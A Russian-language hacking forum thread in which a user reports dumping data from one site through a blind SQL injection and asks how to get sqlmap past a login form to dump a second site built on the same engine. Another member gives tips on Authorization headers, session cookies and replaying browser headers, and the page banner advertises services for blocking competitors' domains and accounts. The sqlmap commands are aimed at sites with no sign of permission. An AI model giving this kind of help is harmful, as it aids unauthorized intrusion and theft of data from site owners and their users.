Помощь в настройке sqlmap для сайта с авторизацией

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Помощь в настройке sqlmap для сайта с авторизацией

Опции темы

Поиск в этой теме

Опции просмотра

05.07.2014, 18:45

vikler

Познающий

Регистрация: 16.08.2012

Сообщений: 92

С нами: 7231286

Репутация: 0

В общем, дела обстоят так. Нашла уязвимый параметр на одном сайте. Оказалось

Код:

Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause

Слила всю информацию, всё шикарно

Но есть ещё другой сайт на таком же движке. Но чтобы в него зайти, необходима авторизация через php форму. У меня есть логин/пасс к этому второму сайту. Зашла и "внутри" обнаружила, что уязвимость точно такая же как у открытого сайта есть.

Теперь вопрос: как авторизоваться через sqlmap нормально, чтобы слить уже данные для второго закрытого сайта?

При вводе

Код:

./sqlmap.py -u "........../index.php" --auth-type Basic --auth-cred 'username:password' -v 3 --data="param1=1&param2=2&param3=3&paramvuln=injecthere" -p paramvuln --level 3 --risk 3 --dbms="MySQL 5"

Ответ

Код:

sqlmap got a 302 redirect to '......./index.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y

и дальше уже такое впечатление, что он до нужной локации с уязвимым параметром paramvuln не доходит (на открытом сайте всё раскручивалось ну ооооч быстро)

Помогите плиз

𝕏 Twitter Reddit Telegram Копировать ссылку

05.07.2014, 19:00

Ereee

Постоянный

Регистрация: 01.12.2011

Сообщений: 560

С нами: 7604246

Репутация: 267

После авторизации будет передаваться хидер, типа:

Код:

Authorization: Basic YWRtaW46YWRtaW4

Где YWRtaW46YWRtaW4=admin:admin.

Соответственно, нужно использовать что-то типа:

Код:

./sqlmap.py --headers="Authorization: Basic YWRtaW46YWRtaW4" -u "...

Вместо YWRtaW46YWRtaW4 берешь логин:пароль, кодируешь в base64 и вставляешь.

08.07.2014, 04:05

vikler

Познающий

Регистрация: 16.08.2012

Сообщений: 92

С нами: 7231286

Репутация: 0

не помогает. И присоединение --cookie= с PHPSESSION

08.07.2014, 05:54

Ereee

Постоянный

Регистрация: 01.12.2011

Сообщений: 560

С нами: 7604246

Репутация: 267

Цитата:

Сообщение от vikler

не помогает. И присоединение --cookie= с PHPSESSION

Может PHPSESSID генерируется с использованим User-Agent и т.д. и т.п. Попробуй полностью спарсить то, что отправляет браузер и через --headers отправить.